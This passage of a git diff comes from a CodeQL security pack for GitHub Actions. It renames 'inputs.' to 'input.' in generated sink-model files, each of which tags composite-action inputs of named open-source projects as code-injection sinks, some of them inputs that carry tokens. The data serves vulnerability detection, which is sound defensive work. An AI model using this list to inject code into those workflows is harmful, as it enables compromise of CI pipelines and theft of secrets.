++-- .../bbq-beets_yujincat-action.model.yml | 4 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 6 +-- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 34 ++++++------- .../celo-org_celo-blockchain.model.yml | 4 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 48 +++++++++---------- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 18 +++---- .../chia-network_actions.model.yml | 4 +- .../chipsalliance_chisel.model.yml | 4 +- .../clickhouse_clickhouse.model.yml | 18 +++---- .../cloudfoundry_cli.model.yml | 2 +- .../cocotb_cocotb.model.yml | 6 +-- .../codeigniter4_codeigniter4.model.yml | 8 ++-- .../com-lihaoyi_mill.model.yml | 4 +- .../cosmos_ibc-go.model.yml | 24 +++++----- .../crowdsecurity_crowdsec.model.yml | 4 +- .../cryptomator_cryptomator.model.yml | 4 +- .../daeuniverse_dae.model.yml | 4 +- .../dafny-lang_dafny.model.yml | 8 ++-- .../dagger_dagger.model.yml | 4 +- .../dash-industry-forum_dash.js.model.yml | 4 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../dbt-labs_dbt-bigquery.model.yml | 18 +++---- .../dbt-labs_dbt-core.model.yml | 8 ++-- .../dbt-labs_dbt-snowflake.model.yml | 18 +++---- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 10 ++-- .../dfhack_dfhack.model.yml | 26 +++++----- .../docker_build-push-action.model.yml | 4 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 34 ++++++------- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 12 ++--- .../etcd-io_bbolt.model.yml | 4 
+- .../reusable-workflows/etcd-io_etcd.model.yml | 8 ++-- .../eventstore_eventstore.model.yml | 4 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 20 ++++---- .../falcosecurity_falco.model.yml | 12 ++--- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 8 ++-- .../firebase_firebase-unity-sdk.model.yml | 28 +++++------ .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 16 +++---- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 6 +-- .../foundatiofx_foundatio.model.yml | 6 +-- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 6 +-- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 4 +- .../getsentry_sentry-unity.model.yml | 4 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 4 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 6 +-- .../hadashia_vcontainer.model.yml | 4 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 4 +- .../hashicorp_terraform-cdk.model.yml | 20 ++++---- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 8 ++-- .../hashicorp_vault.model.yml | 22 ++++----- .../reusable-workflows/heroku_cli.model.yml | 4 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 4 +- .../homuler_mediapipeunityplugin.model.yml | 12 ++--- .../huggingface_doc-builder.model.yml | 18 +++---- .../huggingface_transformers.model.yml | 4 +- .../hyperion-project_hyperion.ng.model.yml | 6 +-- .../reusable-workflows/ibm_sarama.model.yml | 2 +- 
...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 16 +++---- .../kairos-io_kairos.model.yml | 36 +++++++------- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 30 ++++++------ .../reusable-workflows/kiali_kiali.model.yml | 22 ++++----- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 4 +- .../kubescape_kubescape.model.yml | 8 ++-- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 8 ++-- .../labring_sealos.model.yml | 20 ++++---- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 8 ++-- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 6 +-- .../lightning-ai_pytorch-lightning.model.yml | 4 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 4 +- .../reusable-workflows/llvm_circt.model.yml | 16 +++---- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 6 +-- .../mamba-org_mamba.model.yml | 4 +- ...anticoresoftware_manticoresearch.model.yml | 18 +++---- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 8 ++-- .../matter-labs_zksync-era.model.yml | 4 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 10 ++-- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 22 ++++----- .../meshtastic_firmware.model.yml | 10 ++-- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 12 ++--- .../microsoft_msquic.model.yml | 26 
+++++----- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 16 +++---- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 10 ++-- .../reusable-workflows/moby_moby.model.yml | 4 +- .../mosaicml_composer.model.yml | 12 ++--- .../msys2_setup-msys2.model.yml | 4 +- .../mudler_localai.model.yml | 4 +- .../mustardchef_wsabuilds.model.yml | 20 ++++---- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 8 ++-- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 16 +++---- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 12 ++--- .../newrelic_newrelic-dotnet-agent.model.yml | 10 ++-- .../newrelic_newrelic-java-agent.model.yml | 4 +- .../newrelic_node-newrelic.model.yml | 8 ++-- .../nexus-mods_nexusmods.app.model.yml | 8 ++-- .../nginxinc_kubernetes-ingress.model.yml | 22 ++++----- .../nocodb_nocodb.model.yml | 4 +- .../reusable-workflows/novuhq_novu.model.yml | 30 ++++++------ .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 4 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 8 ++-- .../open-goal_jak-project.model.yml | 12 ++--- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 4 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 4 +- ...entelemetry-java-instrumentation.model.yml | 4 +- 
...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 6 +-- .../openbao_openbao.model.yml | 12 ++--- .../openhab_openhab-docs.model.yml | 8 ++-- .../openmined_pysyft.model.yml | 4 +- .../opentofu_opentofu.model.yml | 8 ++-- .../openttd_openttd.model.yml | 24 +++++----- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 14 +++--- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 6 +-- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 4 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 14 +++--- .../pennylaneai_pennylane.model.yml | 6 +-- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 6 +-- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 6 +-- .../preactjs_preact.model.yml | 4 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 4 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 10 ++-- .../puppetlabs_puppetlabs-puppetdb.model.yml | 6 +-- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 4 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 8 ++-- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 6 +-- .../saadeghi_daisyui.model.yml | 4 +- .../sagemath_sage.model.yml | 14 +++--- .../schemastore_schemastore.model.yml | 4 +- 
.../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 4 +- .../shaka-project_shaka-packager.model.yml | 6 +-- .../shaka-project_shaka-player.model.yml | 8 ++-- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 4 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 4 +- .../speedb-io_speedb.model.yml | 4 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 6 +-- .../stdlib-js_stdlib.model.yml | 8 ++-- .../stereokit_stereokit.model.yml | 10 ++-- .../streetsidesoftware_cspell.model.yml | 2 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 8 ++-- .../tgstation_tgstation.model.yml | 6 +-- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 6 +-- .../tiledb-inc_tiledb.model.yml | 4 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 4 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 4 +- .../uyuni-project_uyuni.model.yml | 4 +- .../vert-x3_vertx-hazelcast.model.yml | 4 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 10 ++-- .../web-infra-dev_rspack.model.yml | 4 +- .../reusable-workflows/werf_werf.model.yml | 32 ++++++------- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 8 ++-- .../yt-dlp_yt-dlp.model.yml | 12 ++--- .../zenml-io_zenml.model.yml | 6 +-- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 8 ++-- 597 files changed, 1937 insertions(+), 1937 deletions(-) 
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
index 4bc9d5ed7712..877543ea8e4f 100644
--- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
+++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
@@ -3,12 +3,12 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"]
- - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"]
\ No newline at end of file
+ - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"]
+ - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
index 3ce175684905..1c9d4a7f6d98 100644
--- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
+++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"]
- - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"]
- - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"]
- - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"]
+ - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"]
+ - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"]
+ - ["adap/flower", "*", "input.python-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
index 80a23352e55b..a9d657247359 100644
--- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"]
- - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"]
- - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"]
- - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"]
- - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"]
- - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"]
\ No newline at end of file
+ - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"]
+ - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"]
+ - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"]
+ - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"]
+ - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"]
+ - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
index 441c8ebcd52a..d40014b9a129 100644
--- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"]
\ No newline at end of file
+ - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
index d4e8a2c32bf3..7452ddc21876 100644
--- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"]
- - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"]
\ No newline at end of file
+ - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"]
+ - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
index ce3ed699b9ab..a91d2c7b0e57 100644
--- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"]
- - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"]
\ No newline at end of file
+ - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"]
+ - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
index 8b62fe8e0aad..95b5ba13ad17 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
+ - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
index 946faca35c93..7157e1bea48a 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
+ - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
index b68c9462c1bb..a3f43d524b4a 100644
--- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
+++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"]
- - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"]
- - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"]
- - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"]
- - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"]
\ No newline at end of file
+ - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"]
+ - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"]
+ - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"]
+ - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"]
+ - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
index aedefc9ee02b..6e0d980943a1 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"]
- - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"]
\ No newline at end of file
+ - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"]
+ - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
index 36f7a18e1989..ef682ff4fffe 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"]
- - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"]
\ No newline at end of file
+ - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"]
+ - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
index a1d324f44bdf..7ce84599d17d 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
index 53142801fecd..47f1c83016f5 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"]
- - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"]
+ - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
index 5170beb3a7aa..54353368db2e 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/arrow", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
index 1fabdd9085b2..119115c15609 100644
--- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
index 370d3c6954ee..762623ed27e2 100644
--- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/brpc", "*", "input.options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
index ac0156b719fb..2272d7ff8e68 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
@@ -3,15 +3,15 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"]
- - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"]
\ No newline at end of file
+ - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.version", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.otlp-collector-image-version", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"]
+ - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
index 9ee197ed8848..3537169892a4 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"]
